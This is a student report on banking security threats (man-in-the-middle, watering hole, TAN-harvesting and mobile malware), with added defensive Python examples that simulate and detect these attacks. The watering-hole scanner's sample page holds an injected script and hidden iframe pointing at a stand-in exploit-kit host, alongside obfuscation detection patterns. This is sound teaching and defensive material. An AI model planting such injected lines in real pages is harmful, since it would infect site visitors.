
NETWORK ISSUES IN BANKING

1. MAN-IN-THE-MIDDLE ATTACKS


Man-in-the-middle attacks are typically directed at online banking systems. The
fraudster inserts himself into the communication flow between the customer and
the bank with the aim of manipulating the transaction data to his own advantage,
leaving both the bank and the customer unaware. Technically speaking, man-in-the-middle attacks can take two forms:
remote man-in-the-middle attacks
local man-in-the-middle attacks
REMOTE MAN-IN-THE-MIDDLE ATTACKS
In a remote man-in-the-middle attack, the fraudster uses a variety of
techniques, such as phishing and pharming, to lure the banking customer to a rogue
website. When the customer logs on to his account to make a transaction, the
rogue website captures the password and the transaction details, such as the
beneficiary's bank account number and the amount of the transaction. The
fraudsters then alter the transaction details and submit them on the real banking
website for their own financial benefit, while the customer still believes he is
talking to the bank.
LOCAL MAN-IN-THE-MIDDLE ATTACKS
A local man-in-the-middle attack is carried out by malicious software installed
on the end-user's computer. This software, also called spyware or crimeware,
typically infects the computer through downloads or e-mail attachments. Once
installed, it tracks which websites the end-user visits. When the crimeware
detects that the end-user is visiting an online banking website, it waits for the
user to log on and then initiates or alters financial transactions without the
user knowing.
HOW CAN BANKS AND CUSTOMERS PROTECT THEMSELVES?
The customer should learn to behave securely when banking over the
Internet, just as he should with other applications such as buying goods online.
It is therefore very important that the customer acquires some Internet street
smarts and is able to assess the risks of visiting unfamiliar websites and
downloading pirated software. He should also be properly equipped before setting
foot on the Internet, with anti-virus, anti-spam and anti-spyware software
installed on his computer. Banks should take precautions as well, and strengthen
access control to their online banking applications by means of authentication
technology.
Strong authentication mechanisms come in two important flavors:
1. One-time passwords and
2. Electronic signatures.
One-time passwords are used to authenticate the end-user when he logs on to
the application. A one-time password is generated from a variable parameter,
such as the current time or a random challenge. It is valid only for a limited
time (typically minutes) and can be used only once. The strength of one-time
passwords lies in the fact that they narrow the fraudster's window of
opportunity: a captured one-time password is worthless minutes later, whereas a
captured static password can be reused indefinitely. One-time passwords,
however, do not protect against the injection of new financial transactions or
the alteration of existing ones, because the password proves who logged on but
says nothing about the content of what is submitted afterwards. Electronic
signatures, the second type of authentication mechanism, address this problem by
authenticating the financial transactions themselves. An e-signature allows the
bank to verify that a transaction was initiated by the genuine end-user and was
not altered in transit, so the fraudster can neither submit transactions of his
own nor modify existing ones. E-signatures are therefore a strong control against
both local and remote man-in-the-middle attacks, with one caveat a practitioner
should keep in mind: the signature only protects the data the customer actually
signed, so the transaction details must be presented for signing on something the
crimeware cannot manipulate (for instance a separate token that displays the
beneficiary and amount). If the signature is computed by software on an infected
PC, local malware can feed it altered data before it is signed.

HOW DOES IT WORK?

When the end-user wants to make a financial transaction using an e-signature, a
Message Authentication Code (MAC) is calculated over the transaction. The
calculation takes the original transaction and a secret key as input. The secret
key is shared between the end-user and the bank and known to no one else. The
result of the calculation is the MAC, or e-signature. The end-user electronically
submits the transaction together with the corresponding MAC to the bank. Upon
receipt, the bank computes the MAC over the received transaction with the same
secret key and compares it with the MAC it received from the end-user. If both
are the same, the bank knows that the genuine end-user submitted the transaction
and that it was not modified in transit, and the transaction can be processed.
If there is no match, either a crook submitted the transaction or the transaction
data was altered in transit; in that case the bank rejects the transaction. The
comparison should be done in constant time, so that the bank's response time does
not reveal how many bytes of a guessed MAC were correct.
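The two mechanisms side by side, as an added example that is not part of the original page: a time-based one-time password for login (HMAC-based, with the RFC 4226 truncation) and a MAC-based e-signature over the transaction. The shared secret, the account numbers, the timestamp and the BankServer class are all constructed for the illustration; a real bank would provision one secret per customer and keep it in a token or app. The scenario shows that a replayed OTP is refused, that an OTP-only scheme still processes a transaction rewritten by a man-in-the-middle, and that the recomputed MAC exposes the same rewrite.

```python
import hashlib
import hmac
import json
import struct

# Constructed shared secret for this example. In a real deployment each
# customer has his own secret, provisioned into a token or banking app.
SHARED_SECRET = b"12345678901234567890"
OTP_STEP_SECONDS = 30


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-SHA1 one-time password with the dynamic truncation of RFC 4226."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def totp(secret: bytes, unix_time: int) -> str:
    """Time-based OTP: the variable parameter is the current 30-second window."""
    return hotp(secret, unix_time // OTP_STEP_SECONDS)


def canonical(tx: dict) -> bytes:
    """Deterministic encoding so customer and bank MAC exactly the same bytes."""
    return json.dumps(tx, sort_keys=True, separators=(",", ":")).encode()


def sign_transaction(secret: bytes, tx: dict) -> str:
    """The e-signature described above: a MAC over the transaction under the shared key."""
    return hmac.new(secret, canonical(tx), hashlib.sha256).hexdigest()


class BankServer:
    """Bank side (constructed): checks login OTPs, each usable once, and transaction MACs."""

    def __init__(self, secret: bytes) -> None:
        self.secret = secret
        self.used_otp_windows = set()
        self.logged_in = False

    def login(self, otp: str, unix_time: int) -> bool:
        window = unix_time // OTP_STEP_SECONDS
        if window in self.used_otp_windows:
            return False  # one-time: a captured OTP cannot be replayed
        if not hmac.compare_digest(otp, hotp(self.secret, window)):
            return False
        self.used_otp_windows.add(window)
        self.logged_in = True
        return True

    def process_unsigned(self, tx: dict) -> bool:
        """OTP-only scheme: anything arriving in an authenticated session is accepted."""
        return self.logged_in

    def process_signed(self, tx: dict, mac: str) -> bool:
        """E-signature scheme: recompute the MAC and compare in constant time."""
        return self.logged_in and hmac.compare_digest(sign_transaction(self.secret, tx), mac)


def scenario() -> dict:
    """Customer orders a transfer; a man-in-the-middle rewrites beneficiary and amount."""
    now = 1_700_000_000  # constructed timestamp
    bank = BankServer(SHARED_SECRET)
    intended = {"from": "NL00EXAMPLE0001", "to": "NL00EXAMPLE0002",
                "amount": "100.00", "currency": "EUR", "ref": 1}
    tampered = dict(intended, to="NL00FRAUDSTER01", amount="9500.00")

    otp = totp(SHARED_SECRET, now)
    results = {"login_ok": bank.login(otp, now),
               "otp_replay_rejected": not bank.login(otp, now + 5)}

    # OTP only: the OTP proved who logged in, but nothing ties it to the
    # transaction content, so the altered transfer is processed.
    results["tampered_accepted_with_otp_only"] = bank.process_unsigned(tampered)

    # E-signature: the customer signs exactly what he intends; the bank's
    # recomputed MAC over the altered data no longer matches.
    mac = sign_transaction(SHARED_SECRET, intended)
    results["genuine_accepted_with_mac"] = bank.process_signed(intended, mac)
    results["tampered_accepted_with_mac"] = bank.process_signed(tampered, mac)
    return results


if __name__ == "__main__":
    for name, value in scenario().items():
        print(f"{name}: {value}")
```

The canonical encoding matters in practice: if customer and bank serialise the transaction differently (field order, whitespace, number formatting) the MACs will differ even for an honest transaction, so the format that is signed must be fixed by the bank and reproduced exactly on both sides.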

2. WATERING HOLE
Watering hole attacks are considered an evolution of spear phishing
attacks. They consist of injecting malicious code into the public web pages of a
website that a small, targeted group of people is known to visit.
In a watering hole scenario, the attackers wait for victims to come to
the compromised site instead of inviting them with phishing messages. The
effectiveness of the method is increased by exploiting zero-day vulnerabilities
in widely used client software such as Internet Explorer or Adobe Flash Player,
so that merely viewing the page infects the visitor.
Cyber criminals can easily compromise an improperly configured or unpatched
website using one of the numerous exploit kits available on the black market.
Usually the attackers hack the target site months before they actually use it
for an attack.
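Because the injected code sits in pages the site owner controls, the owner can look for it. The following is an added example, not from the page or from any vendor: a scanner that a site owner or a bank's security team could run over crawled copies of their own pages to spot the script and iframe injections a watering hole uses to redirect visitors to an exploit kit. The sample page, the host names and the obfuscation patterns are constructed for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Patterns typical of injected loader scripts: decoding of escaped payloads,
# eval of assembled strings, document.write of a hidden frame.
OBFUSCATION = re.compile(r"unescape\(|eval\(|String\.fromCharCode|document\.write\(", re.I)


class InjectedContentScanner(HTMLParser):
    """Collects script/iframe references that do not belong to the site itself."""

    def __init__(self, site_host: str) -> None:
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []          # (kind, detail) pairs
        self._inline_script = None  # buffer while inside a <script> without src

    def _is_foreign(self, url: str) -> bool:
        host = (urlparse(url).hostname or "").lower()
        if not host:                # relative URL: served by the site itself
            return False
        return host != self.site_host and not host.endswith("." + self.site_host)

    @staticmethod
    def _is_hidden(attrs: dict) -> bool:
        style = (attrs.get("style") or "").replace(" ", "").lower()
        return (attrs.get("width") == "0" or attrs.get("height") == "0"
                or "display:none" in style or "visibility:hidden" in style)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src")
        if tag in ("script", "iframe") and src and self._is_foreign(src):
            self.findings.append((f"foreign-{tag}", src))
        if tag == "iframe" and self._is_hidden(a):
            self.findings.append(("hidden-iframe", src or ""))
        if tag == "script" and not src:
            self._inline_script = []

    def handle_data(self, data):
        if self._inline_script is not None:
            self._inline_script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline_script is not None:
            body = "".join(self._inline_script)
            self._inline_script = None
            if OBFUSCATION.search(body):
                self.findings.append(("obfuscated-inline-script", body.strip()[:60]))


def scan_page(html: str, site_host: str) -> list:
    """Return the suspicious elements found in one page of the given site."""
    scanner = InjectedContentScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: the bank's own scripts, then two injected elements of the
# kind a watering hole uses to send visitors to an exploit kit.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.examplebank.test/lib.js"></script>
</head><body>
<h1>Welcome</h1>
<script>document.write(unescape('%3Ciframe src=%22http://exploit-kit.example/in.php%22%3E'));</script>
<iframe src="http://exploit-kit.example/in.php" width="0" height="0" style="display: none"></iframe>
</body></html>"""


def demo() -> list:
    return scan_page(SAMPLE_PAGE, "examplebank.test")


if __name__ == "__main__":
    for kind, detail in demo():
        print(f"{kind}: {detail}")
```

Legitimate third-party scripts (analytics, tag managers) will also show up as foreign, so in practice the findings are diffed against a baseline taken from a known-good copy of the site; anything new is what deserves a look.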
The method is very effective, and it is very difficult to locate a compromised
website. A watering hole is a comparatively surgical attack that lets the
attackers hit only a specific community, so it is far less noisy than classic
mass phishing. Targeting a specific website is much more difficult than merely
locating websites that contain a vulnerability: the attacker has to research
and probe for a weakness on the chosen website. Indeed, in watering hole attacks
the attackers may compromise the site long before they use it. Once it is
compromised, the attackers periodically connect to the website to ensure that
they still have access (Symantec). One of the most interesting cases of watering
hole attacks against a financial institution was discovered in late 2012 by
RSA's First Watch research team.
The campaign was called the VOHO attack, and it compromised a regional bank
in Massachusetts using the watering hole tactic. The majority of the
redirection activity was caused by JavaScript elements on two specific
websites, one of a regional bank in Massachusetts and the other of a local
government serving the Washington DC suburbs:

hxxp://www.xxxxxxxxtrust.com
hxxp://xxxxxxcountymd.gov
It is not known exactly how the watering hole sites themselves were compromised.
Files found on one of the compromised websites indicate that the server was
likely compromised with a remote buffer overflow (CVE-2008-3869/CVE-2008-3870)
against the server's sadmind daemon, giving the attacker the ability to
establish a remote shell.

Figure: Watering hole attack

Another well-known watering hole attack against the banking sector was observed
in March 2013, when several South Korean banks were hit by a widespread attack
that wiped data and shut down systems. Internet banking servers went down,
interrupting their services, including online banking.
3. AUTOMATED ATTACKS
Financial malware comes in all shapes and sizes and is often tailored to
target a single organization. How the malware operates is normally dictated by
the bank's defences, so the criminals have no reason to build more complex
malware than those defences require. There are several methods malware authors
use to get around banking security and harvest user information. If a bank uses
single-factor authentication with a static username and password, it is a simple
matter of capturing keystrokes. Some banks have introduced dynamic keypads, so
that the user has to click a 'random' on-screen pattern to enter his password.
Malware authors circumvent this in two ways: they either take screen captures
when the user visits a specific site, or they grab the form data being sent to
the site. In both cases, the stolen data is processed later, offline.
The use of Transaction Authorisation Numbers (TANs) for signing
transactions makes gaining access to accounts somewhat more complex. The TAN may
come from a physical list issued to the account holder by the financial
organisation, or it may be sent via SMS. In either case, the cyber criminal does
not have access to the TAN. In most cases the malware captures the information
entered by the user in the way described above. Once the user enters the TAN, the
malware intercepts it and either displays a fake error message or sends an
incorrect TAN to the financial site, which may result in the user entering another
TAN. Whether an organization requires one or two TANs to complete a transaction
depends on the organization and the security systems it has chosen to implement.
If only one TAN is required per transaction, the attack described above gives the
criminal two valid TANs and therefore two transactions.
The success of such an attack depends heavily on the exact implementation of
the TAN system. Some systems set no expiry for TANs; the next TAN on the list
simply has to be the next TAN used. If the next TAN on the list never reaches the
bank's site, the criminal can either use it immediately or save it for later.
Stolen TANs do, however, have a shorter lifespan than a static username and
password, because a user who experiences persistent problems during an online
banking session is likely to call the bank to request assistance.
Where TANs are sent to the account holder via SMS, a unique TAN can be issued
for each individual transaction, in a manner similar to two-factor
authentication. From that point on the cyber criminals have to process the stolen
data in real time, which is where the man-in-the-middle attack comes in.
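The TAN harvest described above, simulated as an added example that is not part of the original page. The TAN list, the account numbers and both bank classes are constructed. The first bank keeps a paper-style indexed list with no expiry and no link between a TAN and a transaction; the second issues a fresh TAN per transaction and records which transaction it was issued for, the way a transaction-specific SMS TAN works. The same malware trick (swallow the TAN, show a fake error, collect the next one) is run against both.

```python
import hashlib
import secrets

# Constructed TAN list as printed and mailed to the customer; the bank holds
# the same list and expects the TANs in order, with no expiry.
TAN_LIST = ["493812", "105577", "771209", "338461"]


class IndexedTanBank:
    """Paper TAN list: the next TAN on the list must be the next one used.
    Nothing ties a TAN to the transaction it authorises."""

    def __init__(self, tan_list) -> None:
        self.tans = list(tan_list)
        self.next_index = 0

    def authorize(self, tan: str, tx: dict) -> bool:
        if self.next_index < len(self.tans) and secrets.compare_digest(tan, self.tans[self.next_index]):
            self.next_index += 1
            return True
        return False


class TransactionBoundTanBank:
    """SMS-style TAN: generated per transaction and bound to its details."""

    def __init__(self) -> None:
        self.pending = {}  # tan -> hash of the transaction it was issued for

    @staticmethod
    def _tx_hash(tx: dict) -> str:
        return hashlib.sha256(repr(sorted(tx.items())).encode()).hexdigest()

    def issue_tan(self, tx: dict) -> str:
        """Issued when the customer submits tx; sent by SMS with beneficiary and amount."""
        tan = f"{secrets.randbelow(10 ** 6):06d}"
        self.pending[tan] = self._tx_hash(tx)
        return tan

    def authorize(self, tan: str, tx: dict) -> bool:
        expected = self.pending.pop(tan, None)  # single use, whatever the outcome
        return expected is not None and expected == self._tx_hash(tx)


def harvest_attack(bank, typed_tans: list, attacker_tx: dict) -> list:
    """Malware on the customer's PC swallows each TAN the customer types and shows
    a fake error so he types the next one; the harvested TANs are then spent on
    the attacker's own transfer. Returns one accepted/rejected flag per TAN."""
    return [bank.authorize(tan, attacker_tx) for tan in typed_tans]


def scenario() -> dict:
    customer_tx = {"to": "NL00EXAMPLE0002", "amount": "50.00"}
    attacker_tx = {"to": "NL00FRAUDSTER01", "amount": "4900.00"}

    # Paper list: the customer types TAN #1, sees a fake error, types TAN #2.
    paper = IndexedTanBank(TAN_LIST)
    paper_fraud = harvest_attack(paper, [TAN_LIST[0], TAN_LIST[1]], attacker_tx)
    # The list is still in sync, so the customer's next TAN works and he
    # notices nothing until he checks his statement.
    paper_customer_later_ok = paper.authorize(TAN_LIST[2], customer_tx)

    # Bound TANs: both TANs were issued for the customer's transaction, so they
    # authorise nothing else, even though the attacker holds them.
    sms = TransactionBoundTanBank()
    sms_fraud = harvest_attack(sms, [sms.issue_tan(customer_tx), sms.issue_tan(customer_tx)], attacker_tx)
    sms_customer_ok = sms.authorize(sms.issue_tan(customer_tx), customer_tx)

    return {"paper_fraud_transfers": sum(paper_fraud),
            "paper_customer_later_ok": paper_customer_later_ok,
            "sms_fraud_transfers": sum(sms_fraud),
            "sms_customer_ok": sms_customer_ok}


if __name__ == "__main__":
    for name, value in scenario().items():
        print(f"{name}: {value}")
```

The bound variant only helps if the SMS actually shows the beneficiary and amount and the customer reads them before typing the TAN; if the TAN is delivered to a phone that is itself infected, the next section's scenario applies.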
4. MOBILE MALWARE
Mobile phones today are no different from standard computers, so mobile malware
is able to monitor the data the device transmits to the bank's server. An
additional capability of mobile malware is reading the user's SMS messages and
forwarding them to the attacker's C&C server. Since many banks send OTPs via SMS
to the mobile device to authenticate logins and transactions, this feature lets
the attacker use the victim's mobile banking account at will, because he now
holds the second factor as well. Attackers use the same social engineering
techniques to infect mobile users, for example convincing them to install a
"newly required" security application. In 2014 a new, sophisticated piece of
malware called HijackRAT was detected inside a malicious app posing as "Google
Service Framework"; it is capable of:
stealing and forwarding SMS messages (and so re-routing OTP token messages)
stealing contacts
initiating malicious app updates
scanning for installed legitimate banking apps and replacing them with fake
utilities
disabling any mobile security software that might be installed.
Finally, there are many other types of threats that work in the same way,
against more or less advanced controls. Because of this, banking security must
evolve; some of the available security options are:
Device fingerprinting: looking at a combination of identifiable computer or
mobile hardware/software attributes together with the IP address, so that a
session from an unknown device stands out.
Transaction signing: requiring the user to digitally sign each transaction
using a signing solution such as a public key infrastructure (PKI).
Behavioral analytics: detecting pattern anomalies and suspicious activities by
monitoring the user's session.
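Device fingerprinting and behavioral analytics combined into one risk score, as an added example that is not from the page or from any product. The customer history, the fingerprint attributes, the weights and the thresholds are all constructed; a real deployment would tune them on its own data. The point is that the two man-in-the-middle variants from section 1 leave different traces: the remote attacker arrives from an unknown device and network, while the local one rides the customer's own device but pays an unknown beneficiary an unusual amount within seconds of login.

```python
import hashlib
from statistics import mean


def device_fingerprint(attributes: dict) -> str:
    """Hash of stable client attributes (user agent, screen, timezone, language).
    A session from a device the bank has never seen produces an unseen value."""
    material = "|".join(f"{key}={attributes[key]}" for key in sorted(attributes))
    return hashlib.sha256(material.encode()).hexdigest()[:16]


KNOWN_DEVICE = device_fingerprint({"ua": "Mozilla/5.0 (Windows NT 10.0)",
                                   "screen": "1920x1080", "tz": "Europe/Amsterdam",
                                   "lang": "nl-NL"})

# Constructed history of one customer's earlier sessions: device, source IP,
# beneficiary, amount and seconds between login and submitting the transfer.
HISTORY = [
    {"device": KNOWN_DEVICE, "ip": "203.0.113.7", "to": "NL00EXAMPLE0002", "amount": 120.0, "secs_to_submit": 95},
    {"device": KNOWN_DEVICE, "ip": "203.0.113.9", "to": "NL00EXAMPLE0003", "amount": 80.0, "secs_to_submit": 140},
    {"device": KNOWN_DEVICE, "ip": "203.0.113.7", "to": "NL00EXAMPLE0002", "amount": 100.0, "secs_to_submit": 70},
]


def score_session(history: list, session: dict):
    """Return (risk score, reasons) for a transfer submitted in the current session."""
    known_devices = {h["device"] for h in history}
    known_networks = {h["ip"].rsplit(".", 1)[0] for h in history}  # /24 of past IPs
    known_beneficiaries = {h["to"] for h in history}
    typical_amount = mean(h["amount"] for h in history)

    score, reasons = 0, []
    if session["device"] not in known_devices:
        score += 3
        reasons.append("unknown device fingerprint")
    if session["ip"].rsplit(".", 1)[0] not in known_networks:
        score += 1
        reasons.append("source IP outside the customer's usual networks")
    if session["to"] not in known_beneficiaries:
        score += 2
        reasons.append("first payment to this beneficiary")
    if session["amount"] > 5 * typical_amount:
        score += 2
        reasons.append("amount far above the customer's baseline")
    if session["secs_to_submit"] < 10:
        score += 2
        reasons.append("transfer submitted faster than a person would")
    return score, reasons


def decide(score: int) -> str:
    """Map the score to an action: allow, demand a second factor, or block."""
    if score < 3:
        return "allow"
    if score < 6:
        return "step-up"
    return "block"


def scenario() -> dict:
    customer = {"device": KNOWN_DEVICE, "ip": "203.0.113.7",
                "to": "NL00EXAMPLE0002", "amount": 110.0, "secs_to_submit": 88}
    # Local MITM: malware on the customer's own PC injects a transfer right after login.
    local_mitm = {"device": KNOWN_DEVICE, "ip": "203.0.113.7",
                  "to": "NL00FRAUDSTER01", "amount": 4900.0, "secs_to_submit": 3}
    # Remote MITM: captured credentials replayed from the fraudster's machine.
    remote_mitm = {"device": device_fingerprint({"ua": "Mozilla/5.0 (X11; Linux)", "screen": "1366x768",
                                                 "tz": "UTC", "lang": "en-US"}),
                   "ip": "198.51.100.23", "to": "NL00FRAUDSTER01", "amount": 4900.0, "secs_to_submit": 12}
    # The customer on a new laptop, paying a known beneficiary his usual amount.
    new_laptop = {"device": device_fingerprint({"ua": "Mozilla/5.0 (Macintosh)", "screen": "2560x1600",
                                                "tz": "Europe/Amsterdam", "lang": "nl-NL"}),
                  "ip": "203.0.113.9", "to": "NL00EXAMPLE0003", "amount": 90.0, "secs_to_submit": 120}
    sessions = [("customer", customer), ("local_mitm", local_mitm),
                ("remote_mitm", remote_mitm), ("new_laptop", new_laptop)]
    return {name: decide(score_session(HISTORY, s)[0]) for name, s in sessions}


if __name__ == "__main__":
    for name, action in scenario().items():
        print(f"{name}: {action}")
```

The "step-up" outcome is where the one-time password or transaction signature from section 1 is demanded; scoring alone decides when to ask, it does not replace the stronger authentication.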

Submitted by: v.padmapriya (14301037)
MBA Banking Technology, first year
